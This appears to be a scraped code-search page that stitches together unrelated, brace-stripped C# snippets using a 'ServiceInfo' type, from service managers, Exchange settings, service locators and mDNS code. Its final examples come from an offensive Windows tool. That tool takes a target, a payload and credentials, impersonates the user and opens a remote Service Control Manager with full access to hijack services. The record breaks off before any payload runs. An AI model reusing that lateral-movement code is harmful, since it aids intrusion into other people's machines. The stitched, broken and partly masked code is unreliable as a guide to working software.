                                throw e;
                            // Fall back to the default constructor.
                                info.service = (Service)IceInternal.AssemblyUtil.createInstance(c);
                                if (info.service == null)
                                    FailureException e = new FailureException();
                                    e.reason = err + "no default constructor for '" + className + "'";
                                    throw e;
                            catch (UnauthorizedAccessException ex)
                                FailureException e = new FailureException(ex);
                                e.reason = err + "unauthorized access to default service constructor for " + className;
                                throw e;
                    catch (FailureException)
                    catch (InvalidCastException ex)
                        FailureException e = new FailureException(ex);
                        e.reason = err + "service does not implement IceBox.Service";
                        throw e;
                    catch (System.Reflection.TargetInvocationException ex)
                        if (ex.InnerException is FailureException)
                            throw ex.InnerException;
                            FailureException e = new FailureException(ex.InnerException);
                            e.reason = err + "exception in service constructor for " + className;
                            throw e;
                    catch (Exception ex)
                        FailureException e = new FailureException(ex);
                        e.reason = err + "exception in service constructor " + className;
                        throw e;

                        info.service.start(service, communicator, info.args);
                    catch (FailureException)
                    catch (Exception ex)
                        FailureException e = new FailureException(ex);
                        e.reason = "exception while starting service " + service;
                        throw e;

                    info.status = ServiceStatus.Started;
                catch (Exception)
                    if (info.communicator != null)
                        destroyServiceCommunicator(service, info.communicator);

Example #24
 string MYOBFolder(string inFolder)
Example #25
        public void BindSettings(StringDictionary settings)
            ServiceInfo serviceInfo = ES.Services.Servers.GetServiceInfo(PanelRequest.ServiceId);

            if (serviceInfo != null)
                switch (serviceInfo.ProviderId)
                case EXCHANGE2010_PROVIDER_ID:
                    clusteredMailboxServer.Visible = false;
                    txtMailboxClusterName.Text     = "";

                    storageGroup.Visible = false;
                    txtStorageGroup.Text = "";

                    locMailboxDAG.Visible = false;

                    powershellUrl1.Visible = powershellUrl2.Visible = false;

                    archivingGroup.Visible = false;

                case EXCHANGE2010SP2_PROVIDER_ID:
                    clusteredMailboxServer.Visible = false;
                    txtMailboxClusterName.Text     = "";

                    storageGroup.Visible = false;
                    txtStorageGroup.Text = "";

                    locMailboxDatabase.Visible = false;
                    powershellUrl1.Visible     = powershellUrl2.Visible = false;

                    archivingGroup.Visible = false;

                case EXCHANGE2013_PROVIDER_ID:
                    clusteredMailboxServer.Visible = false;
                    txtMailboxClusterName.Text     = "";

                    storageGroup.Visible = false;
                    txtStorageGroup.Text = "";

                    locMailboxDatabase.Visible = false;
                    powershellUrl1.Visible     = powershellUrl2.Visible = true;

                    archivingGroup.Visible = true;

                case EXCHANGE2016_PROVIDER_ID:
                    clusteredMailboxServer.Visible = false;
                    txtMailboxClusterName.Text     = "";

                    storageGroup.Visible = false;
                    txtStorageGroup.Text = "";

                    locMailboxDatabase.Visible = false;
                    powershellUrl1.Visible     = powershellUrl2.Visible = true;

                    archivingGroup.Visible    = true;
                    Ex2016CU6orhigher.Visible = true;

                case EXCHANGE2019_PROVIDER_ID:
                    clusteredMailboxServer.Visible = false;
                    txtMailboxClusterName.Text     = "";

                    storageGroup.Visible = false;
                    txtStorageGroup.Text = "";

                    locMailboxDatabase.Visible = false;
                    powershellUrl1.Visible     = powershellUrl2.Visible = true;

                    archivingGroup.Visible    = true;
                    Ex2016CU6orhigher.Visible = true;

                    storageGroup.Visible           = true;
                    txtStorageGroup.Text           = settings["StorageGroup"];
                    clusteredMailboxServer.Visible = true;
                    txtMailboxClusterName.Text     = settings["MailboxCluster"];
                    locMailboxDAG.Visible          = false;
                    Ex2016CU6orhigher.Visible      = false;
                    archivingGroup.Visible         = false;

            HubTransports = settings["HubTransportServiceID"];
            ClientAccess  = settings["ClientAccessServiceID"];

            // bind exchange services
            BindExchangeServices(ddlHubTransport, true);

            BindExchangeServices(ddlClientAccess, false);

            Utils.SelectListItem(ddlHubTransport, settings["HubTransportServiceID"]);
            Utils.SelectListItem(ddlClientAccess, settings["ClientAccessServiceID"]);

            txtMailboxDatabase.Text = settings["MailboxDatabase"];

            txtKeepDeletedItems.Text     = settings["KeepDeletedItemsDays"];
            txtKeepDeletedMailboxes.Text = settings["KeepDeletedMailboxesDays"];

            txtSmtpServers.Text        = settings["SmtpServers"];
            txtAutodiscoverIP.Text     = settings["AutodiscoverIP"];
            txtAutodiscoverDomain.Text = settings["AutodiscoverDomain"];
            txtOwaUrl.Text             = settings["OwaUrl"];
            txtActiveSyncServer.Text   = settings["ActiveSyncServer"];
            txtOABServer.Text          = settings["OABServer"];
            txtPublicFolderServer.Text = settings["PublicFolderServer"];
            txtPowerShellUrl.Text      = settings["PowerShellUrl"];

            txtArchivingDatabase.Text    = settings["ArchivingDatabase"];
            chkEx2016CU6orhigher.Checked = Utils.ParseBool(settings["Ex2016CU6orhigher"], false);

            chkSEEnable.Checked = Utils.ParseBool(settings["EnableMailFilter"], false);

 public InstanceDownMessage(InstanceInfo instance, ServiceInfo service)
     Instance = instance;
     Service  = service;
Example #27
    protected void Page_Load(object sender, EventArgs e)
        if (Session == null || Session["serviceInfo"] == null)
            objSvcInfo = new ServiceInfo();
            objSvcInfo = (ServiceInfo)Session["serviceInfo"];
            List<string[]> objList = objServiceHandler.getNodeList(SERVICEPAGENAME);

            for (int i = 0; i < objList.Count; i++)
                if (objList[i].Contains("chart"))
                    //Load spray window user control
                    Name = objList[i][1].ToString();
                    Node = objList[i][0].ToString();
        catch (Exception ex)
            AgriCastException currEx = new AgriCastException(objSerPre.GetServiceDetails(), ex);
            AgriCastLogger.Publish(currEx, AgriCastLogger.LogType.Error);
            HttpContext.Current.Session["ErrorMessage"] = objCommonUtil.getTransText(Constants.MOB_LOAD_FAILURE) + " : " + ex.Message.ToString();
Example #28
        private void StartService(string service, string entryPoint, string[] args)
            lock (this)
                // Extract the assembly name and the class name.
                int sepPos = entryPoint.IndexOf(':');
                if (sepPos != -1)
                    const string driveLetters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
                    if (entryPoint.Length > 3 &&
                        sepPos == 1 &&
                        driveLetters.IndexOf(entryPoint[0]) != -1 &&
                        (entryPoint[2] == '\\' || entryPoint[2] == '/'))
                        sepPos = entryPoint.IndexOf(':', 3);
                if (sepPos == -1)
                    throw new FormatException($"invalid entry point format `{entryPoint}");

                System.Reflection.Assembly?serviceAssembly = null;
                string assemblyName = entryPoint.Substring(0, sepPos);
                string className    = entryPoint.Substring(sepPos + 1);

                    // First try to load the assembly using Assembly.Load, which will succeed
                    // if a fully-qualified name is provided or if a partial name has been qualified
                    // in configuration. If that fails, try Assembly.LoadFrom(), which will succeed
                    // if a file name is configured or a partial name is configured and DEVPATH is used.
                        serviceAssembly = System.Reflection.Assembly.Load(assemblyName);
                    catch (System.Exception ex)
                            serviceAssembly = System.Reflection.Assembly.LoadFrom(assemblyName);
                        catch (System.Exception)
#pragma warning disable CA2200 // Rethrow to preserve stack details.
                            throw ex;
#pragma warning restore CA2200 // Rethrow to preserve stack details.
                catch (System.Exception ex)
                    throw new InvalidOperationException(
                              $"ServiceManager: unable to load service '{entryPoint}': error loading assembly: {assemblyName}", ex);

                // Instantiate the class.
                Type?c = null;
                    c = serviceAssembly.GetType(className, true);
                catch (System.Exception ex)
                    throw new InvalidOperationException(
                              $"ServiceManager: unable to load service '{entryPoint}': cannot find the service class `{className}'", ex);

                var info = new ServiceInfo(service, ServiceStatus.Stopped, args);

                ILogger?logger = null;
                // If IceBox.UseSharedCommunicator.<name> is defined, create a
                // communicator for the service. The communicator inherits
                // from the shared communicator properties. If it's not
                // defined, add the service properties to the shared
                // commnunicator property set.
                Communicator communicator;
                if (_communicator.GetPropertyAsInt($"IceBox.UseSharedCommunicator.{service}") > 0)
                    Debug.Assert(_sharedCommunicator != null);
                    communicator = _sharedCommunicator;
                    // Create the service properties. We use the communicator properties as the default
                    // properties if IceBox.InheritProperties is set.
                    Dictionary <string, string> properties = CreateServiceProperties(service);
                    if (info.Args.Length > 0)
                        // Create the service properties with the given service arguments. This should
                        // read the service config file if it's specified with --Ice.Config.
                        properties.ParseIceArgs(ref info.Args);

                        // Next, parse the service "<service>.*" command line options (the Ice command
                        // line options were parsed by the createProperties above)
                        properties.ParseArgs(ref info.Args, service);

                    // Clone the logger to assign a new prefix. If one of the built-in loggers is configured
                    // don't set any logger.
                    if (properties.TryGetValue("Ice.LogFile", out string?logFile))
                        logger = _logger.CloneWithPrefix(properties.GetValueOrDefault("Ice.ProgramName") ?? "");

                    // If Admin is enabled on the IceBox communicator, for each service that does not set
                    // Ice.Admin.Enabled, we set Ice.Admin.Enabled=1 to have this service create facets; then
                    // we add these facets to the IceBox Admin object as IceBox.Service.<service>.<facet>.
                    string serviceFacetNamePrefix = "IceBox.Service." + service + ".";
                    bool   addFacets = ConfigureAdmin(properties, serviceFacetNamePrefix);

                    // Remaining command line options are passed to the communicator. This is
                    // necessary for Ice plug-in properties (e.g.: IceSSL).
                    info.Communicator = new Communicator(ref info.Args, properties, logger: logger);
                    communicator      = info.Communicator;

                    if (addFacets)
                        // Add all facets created on the service communicator to the IceBox communicator
                        // but renamed IceBox.Service.<service>.<facet-name>, except for the Process facet
                        // which is never added
                        foreach (KeyValuePair <string, IObject> p in communicator.FindAllAdminFacets())
                            if (!p.Key.Equals("Process"))
                                _communicator.AddAdminFacet(p.Value, serviceFacetNamePrefix + p.Key);

                    // Instantiate the service.
                        // If the service class provides a constructor that accepts an Ice.Communicator argument,
                        // use that in preference to the default constructor.
                        var parameterTypes = new Type[1];
                        parameterTypes[0] = typeof(Communicator);
                        System.Reflection.ConstructorInfo?ci = c.GetConstructor(parameterTypes);
                        if (ci != null)
                            object[] parameters = new object[1];
                            parameters[0] = _communicator;
                            s             = (IService)ci.Invoke(parameters);
                            // Fall back to the default constructor.
                            s = (IService?)IceInternal.AssemblyUtil.CreateInstance(c);
                    catch (System.Exception ex)
                        throw new InvalidOperationException($"ServiceManager: unable to load service '{entryPoint}", ex);

                    info.Service = s ?? throw new InvalidOperationException(
                                             $"ServiceManager: unable to load service '{entryPoint}': " +
                                             $"no default constructor for `{className}'");

                        info.Service.start(service, communicator, info.Args);
                    catch (System.Exception ex)
                        throw new InvalidOperationException($"ServiceManager: exception while starting service {service}", ex);

                    info.Status = ServiceStatus.Started;
                catch (System.Exception)
                    if (info.Communicator != null)
                        DestroyServiceCommunicator(service, info.Communicator);

Example #29
            public CustomServiceRegistration(CustomComponentRegistration ccRegistration, ServiceInfo serviceInfo)
                : base(ccRegistration)
                _serviceInfo = serviceInfo;

                // Some additional initializations (collections)
                serviceInfo.AutoInjections  = _autoInjections;
                serviceInfo.Substitutes     = _substitutes;
                serviceInfo.SubstituteNames = _substituteNames;
                serviceInfo.Requires        = _requires;
                serviceInfo.MemberOfLists   = _inLists;
Example #30
        private Process StartService(ServiceInfo service)
            // 检查应用是否已启动
            var pidFile = NewLife.Setting.Current.DataPath.CombinePath($"{service.Name}.pid").GetBasePath();

            if (File.Exists(pidFile))
                    // 读取 pid,procss_name
                    var ss = File.ReadAllText(pidFile).Split(",");
                    if (ss != null && ss.Length >= 2)
                        var p = Process.GetProcessById(ss[0].ToInt());
                        if (p != null && !p.HasExited && p.ProcessName == ss[1])
                            WriteLog("应用[{0}/{1}]已启动,直接接管", service.Name, ss[0]);

                            _processes[service.Name] = p;

                catch (Exception ex)
                    if (!(ex is ArgumentException))

            // 修正路径
            var workDir = service.WorkingDirectory;
            var file    = service.FileName;

            if (file.Contains("/") || file.Contains("\\"))
                file = file.GetFullPath();
                if (workDir.IsNullOrEmpty())
                    workDir = Path.GetDirectoryName(file);

            var fullFile = file;

            if (!workDir.IsNullOrEmpty() && !Path.IsPathRooted(fullFile))
                fullFile = workDir.CombinePath(fullFile).GetFullPath();

            if (/*service.Arguments.IsNullOrEmpty() ||*/ service.Singleton)
                // 遍历进程,检查是否已驱动
                foreach (var p in Process.GetProcesses())
                        if (p.ProcessName.EqualIgnoreCase(service.Name) || p.MainModule.FileName.EqualIgnoreCase(fullFile))
                            WriteLog("应用[{0}/{1}]已启动,直接接管", service.Name, p.Id);

                            _processes[service.Name] = p;
                            File.WriteAllText(pidFile, $"{p.Id},{p.ProcessName}");

                    catch { }

            WriteLog("启动进程:{0} {1} {2}", file, service.Arguments, workDir);

            var si = new ProcessStartInfo
                FileName         = file,
                Arguments        = service.Arguments,
                WorkingDirectory = workDir,

                // false时目前控制台合并到当前控制台,一起退出;
                // true时目标控制台独立窗口,不会一起退出;
                UseShellExecute = true,

            var retry = service.Retry;

            if (retry <= 0)
                retry = 1024;
            for (var i = 0; i < retry; i++)
                    var p = Process.Start(si);

                    WriteLog("应用[{0}]启动成功 PID={1}", service.Name, p.Id);

                    // 记录进程信息,避免宿主重启后无法继续管理
                    _processes[service.Name] = p;
                    File.WriteAllText(pidFile, $"{p.Id},{p.ProcessName}");

                catch (Exception ex)
                    Log?.Write(LogLevel.Error, "{0}", ex);


Example #31
 internal void OnServiceChanged(ServiceInfo service)
     ServiceAnnouncement announcement;
     lock (_serviceAnnouncements)
         announcement = _serviceAnnouncements[Tuple.Create(service.NetworkInterface.Id, service.Name)];
     var tmpAnnouncement = new ServiceAnnouncement()
         Hostname = service.HostName.Labels[0],
         Domain = service.HostName.SubName(1).ToString(),
         Addresses = service.Addresses,
         Instance = service.Name.Labels[0],
         NetworkInterface = service.NetworkInterface,
         Port = (ushort)service.Port,
         Txt = service.Txt,
         Type = service.Name.SubName(1, 2).ToString()
     SynchronizationContextPost(o =>
         announcement.Hostname = tmpAnnouncement.Hostname;
         announcement.Domain = tmpAnnouncement.Domain;
         announcement.Addresses = tmpAnnouncement.Addresses;
         announcement.Instance = tmpAnnouncement.Instance;
         announcement.NetworkInterface = tmpAnnouncement.NetworkInterface;
         announcement.Port = tmpAnnouncement.Port;
         announcement.Txt = tmpAnnouncement.Txt;
         announcement.Type = tmpAnnouncement.Type;
         if (ServiceChanged != null)
             ServiceChanged(this, new ServiceAnnouncementEventArgs(announcement));
Example #32
 public void RemoveServiceInfo(ServiceInfo service)
Example #33
        public override void startService(string name, Ice.Current current)
            ServiceInfo info = new ServiceInfo();
            // Search would be more efficient if services were contained in
            // a map, but order is required for shutdown.
            int i;
            for(i = 0; i < _services.Count; ++i)
                info = _services[i];
                    if(_services[i].status != ServiceStatus.Stopped)
                        throw new AlreadyStartedException();
                    info.status = ServiceStatus.Starting;
                    _services[i] = info;
            if(i == _services.Count)
                throw new NoSuchServiceException();
            _pendingStatusChanges = true;

            bool started = false;
            info.service.start(info.name, info.communicator == null ? _sharedCommunicator : info.communicator,
            started = true;
            catch(Exception e)
            _logger.warning("ServiceManager: exception while starting service " + info.name + ":\n" + e.ToString());

            int i;
            for(i = 0; i < _services.Count; ++i)
                info = _services[i];
                        info.status = ServiceStatus.Started;

                        List<string> services = new List<string>();
                        servicesStarted(services, _observers.Keys);
                        info.status = ServiceStatus.Stopped;
                    _services[i] = info;
            _pendingStatusChanges = false;
Example #34
        /// <summary>
        /// Registers a specific instance of an service.
        /// </summary>
        /// <param name="serviceType">Type of the service.</param>
        /// <param name="instance">The specific instance to register.</param>
        /// <param name="tag">The tag to register the service with. The default value is <c>null</c>.</param>
        /// <param name="originalContainer">The original container where the instance was found in.</param>
        /// <exception cref="ArgumentNullException">The <paramref name="serviceType"/> is <c>null</c>.</exception>
        /// <exception cref="ArgumentNullException">The <paramref name="instance"/> is <c>null</c>.</exception>
        private void RegisterInstance(Type serviceType, object instance, object tag, object originalContainer)
            Argument.IsNotNull("serviceType", serviceType);
            Argument.IsNotNull("instance", instance);

            Log.Debug("Registering type '{0}' to instance of type '{1}'", serviceType.FullName, instance.GetType().FullName);

            var registeredTypeInfo = new ServiceLocatorRegistration(serviceType, instance.GetType(), tag, RegistrationType.Singleton, x => instance);

            lock (this)
                var serviceInfo = new ServiceInfo(serviceType, tag);

                if (_registeredTypes.ContainsKey(serviceInfo))
                    // Re-use previous subscription
                    registeredTypeInfo = _registeredTypes[serviceInfo];
                    _registeredTypes[serviceInfo] = registeredTypeInfo;

                _registeredInstances[serviceInfo] = new RegisteredInstanceInfo(registeredTypeInfo, instance);

            TypeRegistered.SafeInvoke(this, new TypeRegisteredEventArgs(registeredTypeInfo.DeclaringType, registeredTypeInfo.ImplementingType, tag, RegistrationType.Singleton));

            Log.Debug("Registered type '{0}' to instance of type '{1}'", serviceType.FullName, instance.GetType().FullName);
 public int Insert_Service(ServiceInfo service)
Example #36
        /// <summary>
        /// Registers the specific implementing type for the service type.
        /// </summary>
        /// <param name="serviceType">Type of the service.</param>
        /// <param name="serviceImplementationType">Type of the implementing.</param>
        /// <param name="tag">The tag to register the service with. The default value is <c>null</c>.</param>
        /// <param name="registrationType">The registration type.</param>
        /// <param name="registerIfAlreadyRegistered">if set to <c>true</c>, an older type registration is overwritten by this new one.</param>
        /// <param name="originalContainer">The original container where the type was found in.</param>
        /// <param name="createServiceFunc">The create service function.</param>
        /// <exception cref="System.InvalidOperationException"></exception>
        /// <exception cref="ArgumentNullException">The <paramref name="serviceType" /> is <c>null</c>.</exception>
        private void RegisterType(Type serviceType, Type serviceImplementationType, object tag, RegistrationType registrationType, bool registerIfAlreadyRegistered, object originalContainer, Func<ServiceLocatorRegistration, object> createServiceFunc)
            Argument.IsNotNull("serviceType", serviceType);

            if (serviceImplementationType == null)
                // Dynamic late-bound type
                serviceImplementationType = typeof(LateBoundImplementation);

            if (serviceImplementationType.IsInterfaceEx())
                throw Log.ErrorAndCreateException<InvalidOperationException>("Cannot register interface type '{0}' as implementation, make sure to specify an actual class", serviceImplementationType.GetSafeFullName());

            /* TODO: This code have to be here to ensure the right usage of non-generic overloads of register methods.
             * TODO: If it is finally accepted then remove it from ServiceLocatorAutoRegistrationManager
            if (serviceImplementationType.IsAbstractEx() || !serviceType.IsAssignableFromEx(serviceImplementationType))
                string message = string.Format("The type '{0}' is abstract or can't be registered as '{1}'", serviceImplementationType, serviceType);
                throw new InvalidOperationException(message);

            // Outside lock scope for event
            ServiceLocatorRegistration registeredTypeInfo = null;

            lock (this)
                if (!registerIfAlreadyRegistered && IsTypeRegistered(serviceType, tag))
                    //Log.Debug("Type '{0}' already registered, will not overwrite registration", serviceType.FullName);

                var serviceInfo = new ServiceInfo(serviceType, tag);
                if (_registeredInstances.ContainsKey(serviceInfo))

                Log.Debug("Registering type '{0}' to type '{1}'", serviceType.FullName, serviceImplementationType.FullName);

                registeredTypeInfo = new ServiceLocatorRegistration(serviceType, serviceImplementationType, tag, registrationType,
                    x => (createServiceFunc != null) ? createServiceFunc(x) : CreateServiceInstance(x));
                _registeredTypes[serviceInfo] = registeredTypeInfo;

            TypeRegistered.SafeInvoke(this, new TypeRegisteredEventArgs(registeredTypeInfo.DeclaringType, registeredTypeInfo.ImplementingType, tag, registeredTypeInfo.RegistrationType));

            Log.Debug("Registered type '{0}' to type '{1}'", serviceType.FullName, serviceImplementationType.FullName);
Example #37
 public ProcessBuilder WithServiceInfo(ServiceInfo serviceInfo)
     m_serviceInfo = serviceInfo;
Example #38
        /// <summary>
        /// Resolves the type from a known container.
        /// </summary>
        /// <param name="serviceType">Type of the service.</param>
        /// <param name="tag">The tag to register the service with. The default value is <c>null</c>.</param>
        /// <returns>An instance of the type registered on the service.</returns>
        /// <exception cref="ArgumentNullException">The <paramref name="serviceType"/> is <c>null</c>.</exception>
        /// <exception cref="ArgumentOutOfRangeException">The type is not found in any container.</exception>
        private object ResolveTypeFromKnownContainer(Type serviceType, object tag)
            Argument.IsNotNull("serviceType", serviceType);

            lock (this)
                var typeRequestInfo = new TypeRequestInfo(serviceType, tag);
                if (_currentTypeRequestPath == null)
                    _currentTypeRequestPath = new TypeRequestPath(typeRequestInfo, name: "ServiceLocator");
                    _currentTypeRequestPath.IgnoreDuplicateRequestsDirectlyAfterEachother = false;
                    _currentTypeRequestPath.PushType(typeRequestInfo, false);

                    if (!_currentTypeRequestPath.IsValid)
                        // Reset path for next types that are being resolved
                        var typeRequestPath = _currentTypeRequestPath;
                        _currentTypeRequestPath = null;


                var serviceInfo = new ServiceInfo(serviceType, tag);
                var registeredTypeInfo = _registeredTypes[serviceInfo];

                object instance = registeredTypeInfo.CreateServiceFunc(registeredTypeInfo);
                if (instance == null)

                if (IsTypeRegisteredAsSingleton(serviceType, tag))
                    RegisterInstance(serviceType, instance, tag, this);


                return instance;
 public Task NotifyEndpointReady(IReceiveEndpoint receiveEndpoint, InstanceInfo instanceInfo, ServiceInfo serviceInfo)
     return(Task.WhenAll(_messageTypes.Values.Select(type => type.NotifyEndpointReady(receiveEndpoint, instanceInfo, serviceInfo))));
Example #40
        public static UserServiceClient CreateServiceClient(string address, ServiceInfo serviceInfo, IUserServiceCallback userServiceCallback)
            var factory = new UserServiceFactory(address, serviceInfo, userServiceCallback);

            return(new UserServiceClient(factory.instanceContext, factory.binding, factory.endPointAddress));
 public static void UnInstall(ServiceInfo serviceInfo)
     Install(false, serviceInfo);
Example #42
        void Register_service(ServiceInfo service)
            var handler = Create_handler(service);

            Register_route(service.HttpMethod, service.Route, handler);
 public CodeTemplateGlobals(PythonGenerator generator, ServiceInfo serviceInfo, HttpServiceInfo?httpServiceInfo)
     Service            = serviceInfo;
     HttpService        = httpServiceInfo;
     CodeGenCommentText = CodeGenUtility.GetCodeGenComment(generator.GeneratorName ?? "");
Example #44
 object[] Get_input(dynamic routeParams, ServiceInfo service)
     return(service.Parameters.Select(p => Get_input_from_param(routeParams, Request.Query, p))
Example #45
        public override void stopService(string name, Ice.Current current)
            ServiceInfo info = new ServiceInfo();
            // Search would be more efficient if services were contained in
            // a map, but order is required for shutdown.
            int i;
            for(i = 0; i < _services.Count; ++i)
                info = _services[i];
                    if(info.status != ServiceStatus.Started)
                        throw new AlreadyStoppedException();
                    info.status = ServiceStatus.Stopping;
                    _services[i] = info;
            if(i == _services.Count)
                throw new NoSuchServiceException();
            _pendingStatusChanges = true;

            bool stopped = false;
            stopped = true;
            catch(Exception e)
            _logger.warning("ServiceManager: exception while stopping service " + info.name + "\n" + e.ToString());

            int i;
            for(i = 0; i < _services.Count; ++i)
                info = _services[i];
                        info.status = ServiceStatus.Stopped;

                        List<string> services = new List<string>();
                        servicesStopped(services, _observers.Keys);
                        info.status = ServiceStatus.Started;
                    _services[i] = info;
            _pendingStatusChanges = false;
 public OnlineIdAuthenticationProvider(ServiceInfo serviceInfo)
     : base(serviceInfo)
     this.authenticator = new OnlineIdAuthenticator();
Example #47
 public TaskRetryResult(ServiceInfo service, Exception exception)
     Service   = service;
     Exception = exception;
 private ServiceInfo FindOrCreatePacketService(Name name)
     ServiceInfo service;
     bool found = _packetServiceInfos.TryGetValue(name, out service);
     if (service == null)
         if (found)
         service = new ServiceInfo(NetworkInterface, name);
         _packetServiceInfos.Add(name, service);
     return service;
    protected void btnAddService_Click(object sender, EventArgs e)
        ServiceInfo _service = new ServiceInfo();
         int flag = 0;
         if (txtService.Text == "")
             lblMessage.Text = "No Service Name.";
             flag = 1;
         if (txtPrice.Text == "")
             lblMessage.Text = "No Price for Service.";
             flag = 1;

         if (flag == 0)

             _service.ServiceName = txtService.Text;
             _service.rate = int.Parse(txtPrice.Text);
             _service.CategoryID = int.Parse(ddlCategory.SelectedValue);
             //txtCategory.Text = ddlCategory.SelectedValue;
                 lblMessage.Text = "Service Saved succesfully Added";
             catch (Exception ex)
                 lblMessage.Text = ex.Message;
 private void AddServiceHostInfo(ServiceInfo service)
     Name hostname = service.HostName;
     HostInfo hostInfo;
     _hostInfos.TryGetValue(hostname, out hostInfo);
     if (hostInfo == null)
         hostInfo = new HostInfo();
         HostAddresses hostAddresses;
         if (_packetHostAddresses.TryGetValue(hostname, out hostAddresses))
             hostInfo.Addresses = hostAddresses.IPv4Addresses;
             if (hostInfo.Addresses == null)
                 hostInfo.Addresses = hostAddresses.IPv6Addresses;
             else if (hostAddresses.IPv6Addresses != null)
         _hostInfos.Add(hostname, hostInfo);
     service.Addresses = hostInfo.Addresses;
Example #51
 internal void OnServiceRemoved(ServiceInfo service)
     var key = Tuple.Create(service.NetworkInterface.Id, service.Name);
     ServiceAnnouncement announcement;
     lock (_serviceAnnouncements)
         announcement = _serviceAnnouncements[key];
     SynchronizationContextPost(o =>
         announcement.IsRemoved = true;
         lock (_services)
         if (ServiceRemoved != null)
             ServiceRemoved(this, new ServiceAnnouncementEventArgs(announcement));
Example #52
 public TaskRetryResult(ServiceInfo service, object result)
     Service = service;
     Result  = result;
Example #53
 internal void OnServiceAdded(ServiceInfo service)
     var announcement = new ServiceAnnouncement
         Hostname = service.HostName.Labels[0],
         Domain = service.HostName.SubName(1).ToString(),
         Addresses = service.Addresses,
         Instance = service.Name.Labels[0],
         NetworkInterface = service.NetworkInterface,
         Port = (ushort)service.Port,
         Txt = service.Txt,
         Type = service.Name.SubName(1, 2).ToString()
     lock (_serviceAnnouncements)
         _serviceAnnouncements.Add(Tuple.Create(service.NetworkInterface.Id, service.Name), announcement);
     SynchronizationContextPost(o =>
         lock (_services)
         if (ServiceAdded != null)
             ServiceAdded(this, new ServiceAnnouncementEventArgs(announcement));
 ServiceInfo FindServiceCore(bool findServiceWithKey, ServiceInfo primary, ServiceInfo secondary)
     return(findServiceWithKey ? primary : !primary.HasKey ? primary : !secondary.HasKey ? secondary : primary);
 private void ClearServiceHostInfo(ServiceInfo service)
     Name hostname = service.HostName;
     HostInfo hostInfo;
     _hostInfos.TryGetValue(hostname, out hostInfo);
     if (hostInfo != null)
         if (hostInfo.ServiceInfos.Count == 0)
         service.HostName = null;
         service.Addresses = null;
Example #56
        public static ServiceInfo GetServiceInfo(string ServiceName, IntPtr SCMHandle)
            Console.WriteLine($"    |-> Querying service {ServiceName}");

            ServiceInfo serviceInfo = new ServiceInfo();

                IntPtr serviceHandle = OpenService(SCMHandle, ServiceName, 0xF01FF);

                uint bytesNeeded         = 0;

                IntPtr qscPtr = IntPtr.Zero;

                bool retCode = QueryServiceConfig(serviceHandle, qscPtr, 0, out bytesNeeded);

                if (!retCode && bytesNeeded == 0)
                    throw new Win32Exception();
                    qscPtr  = Marshal.AllocCoTaskMem((int)bytesNeeded);
                    retCode = QueryServiceConfig(serviceHandle, qscPtr, bytesNeeded, out bytesNeeded);
                    if (!retCode)
                        throw new Win32Exception();
                    qsc.binaryPathName = IntPtr.Zero;
                    qsc.dependencies   = IntPtr.Zero;
                    qsc.displayName    = IntPtr.Zero;
                    qsc.loadOrderGroup = IntPtr.Zero;
                    qsc.startName      = IntPtr.Zero;

                    qsc = (QUERY_SERVICE_CONFIG)Marshal.PtrToStructure(qscPtr, typeof(QUERY_SERVICE_CONFIG));

                serviceInfo.binaryPathName = Marshal.PtrToStringAuto(qsc.binaryPathName);
                serviceInfo.dependencies   = Marshal.PtrToStringAuto(qsc.dependencies);
                serviceInfo.displayName    = Marshal.PtrToStringAuto(qsc.displayName);
                serviceInfo.loadOrderGroup = Marshal.PtrToStringAuto(qsc.loadOrderGroup);
                serviceInfo.startName      = Marshal.PtrToStringAuto(qsc.startName);

                serviceInfo.errorControl  = qsc.errorControl;
                serviceInfo.serviceType   = qsc.serviceType;
                serviceInfo.startType     = qsc.startType;
                serviceInfo.tagID         = qsc.tagID;
                serviceInfo.serviceHandle = serviceHandle; // Return service handler

            catch (Exception)
                string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                Console.WriteLine("\n[!] GetServiceInfo failed. Error: {0}", errorMessage);

Example #57
        private static void FilteredLog(ILogger logger, LogLevel level, string message, Exception exception = null, ServiceInfo serviceInfo = null)
            //don't log thread abort exception
            if (exception is System.Threading.ThreadAbortException)

            if (logger.IsEnabled(level))
                string fullMessage = exception == null ? string.Empty : exception.ToString();
                logger.InsertLog(level, message, fullMessage, serviceInfo);
Example #58
        static void Main(string[] args)
            // example from https://github.com/s0lst1c3/SharpFinder
            ProgramOptions options = new ProgramOptions();

            foreach (string arg in args)
                if (arg.StartsWith("--target="))
                    string[] components = arg.Split(new string[] { "--target=" }, StringSplitOptions.None);
                    options.target = components[1];
                else if (arg.StartsWith("--payload="))
                    string[] components = arg.Split(new string[] { "--payload=" }, StringSplitOptions.None);

                    options.payload = components[1];
                else if (arg.StartsWith("--username="******"--username="******"--password="******"--password="******"--domain="))
                    string[] components = arg.Split(new string[] { "--domain=" }, StringSplitOptions.None);
                    options.domain = components[1];
                else if (arg.StartsWith("--service="))
                    string[] components = arg.Split(new string[] { "--service=" }, StringSplitOptions.None);
                    options.service = components[1];
                else if (arg.StartsWith("--help"))
                    Console.WriteLine("[!] Invalid flag: " + arg);

            string username = null;
            string password = null;
            string domain   = null;

            bool result = false;

            if (!String.IsNullOrEmpty(options.username) && !String.IsNullOrEmpty(options.password))
                IntPtr phToken = IntPtr.Zero;
                username = options.username;
                password = options.password;
                domain   = options.domain;

                result = LogonUserA(username, domain, password, (int)LOGON_TYPE.LOGON32_LOGON_NEW_CREDENTIALS, (int)LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref phToken);

                if (!result)
                    string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                    Console.WriteLine("[!] LogonUser failed. Error: {0}", errorMessage);

                result = ImpersonateLoggedOnUser(phToken);
                if (!result)
                    string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                    Console.WriteLine("[!] ImpersonateLoggedOnUser failed. Error:{0}", errorMessage);

            if (options.target == "" || options.payload == "")

            string target = options.target;

                Console.WriteLine($"\n[>] Open SC Manager from {target}.");
                IntPtr SCMHandle = OpenSCManager(options.target, null, SC_MANAGER_ALL_ACCESS);

                if (SCMHandle == IntPtr.Zero)
                    string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                    Console.WriteLine("[!] OpenSCManager failed. Error: {0}", errorMessage);

                // Open Connection to the remote machine and get all services
                Console.WriteLine($"\n[>] Getting services information from {target}.");
                ServiceController[] services = ServiceController.GetServices(target);

                ServiceInfo serviceInfo = new ServiceInfo();

                if (options.service == "")
